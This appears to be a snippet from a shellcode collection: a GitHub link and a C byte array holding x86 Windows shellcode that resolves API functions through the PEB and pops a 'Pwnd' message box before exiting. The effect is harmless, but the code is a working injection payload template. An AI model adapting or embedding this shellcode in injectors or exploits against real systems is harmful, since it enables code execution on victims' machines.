https://github.com/peterferrie/win-exec-calc-shellcode/tree/master

// Messagebox Payload
unsigned char payload[] = {
    0x31,0xC9,0xF7,0xE1,0x64,0x8B,0x41,0x30,0x8B,0x40,
    0x0C,0x8B,0x70,0x14,0xAD,0x96,0xAD,0x8B,0x58,0x10,
    0x8B,0x53,0x3C,0x01,0xDA,0x8B,0x52,0x78,0x01,0xDA,
    0x8B,0x72,0x20,0x01,0xDE,0x31,0xC9,0x41,0xAD,0x01,
    0xD8,0x81,0x38,0x47,0x65,0x74,0x50,0x75,0xF4,0x81,
    0x78,0x04,0x72,0x6F,0x63,0x41,0x75,0xEB,0x81,0x78,
    0x08,0x64,0x64,0x72,0x65,0x75,0xE2,0x8B,0x72,0x24,
    0x01,0xDE,0x66,0x8B,0x0C,0x4E,0x49,0x8B,0x72,0x1C,
    0x01,0xDE,0x8B,0x14,0x8E,0x01,0xDA,0x89,0xD5,0x31,
    0xC9,0x51,0x68,0x61,0x72,0x79,0x41,0x68,0x4C,0x69,
    0x62,0x72,0x68,0x4C,0x6F,0x61,0x64,0x54,0x53,0xFF,
    0xD2,0x68,0x6C,0x6C,0x61,0x61,0x66,0x81,0x6C,0x24,
    0x02,0x61,0x61,0x68,0x33,0x32,0x2E,0x64,0x68,0x55,
    0x73,0x65,0x72,0x54,0xFF,0xD0,0x68,0x6F,0x78,0x41,
    0x61,0x66,0x83,0x6C,0x24,0x03,0x61,0x68,0x61,0x67,
    0x65,0x42,0x68,0x4D,0x65,0x73,0x73,0x54,0x50,0xFF,
    0xD5,0x83,0xC4,0x10,0x31,0xD2,0x31,0xC9,0x52,0x68,
    0x50,0x77,0x6E,0x64,0x89,0xE7,0x52,0x68,0x59,0x65,
    0x73,0x73,0x89,0xE1,0x52,0x57,0x51,0x52,0xFF,0xD0,
    0x83,0xC4,0x10,0x68,0x65,0x73,0x73,0x61,0x66,0x83,
    0x6C,0x24,0x03,0x61,0x68,0x50,0x72,0x6F,0x63,0x68,
    0x45,0x78,0x69,0x74,0x54,0x53,0xFF,0xD5,0x31,0xC9,
    0x51,0xFF,0xD0
};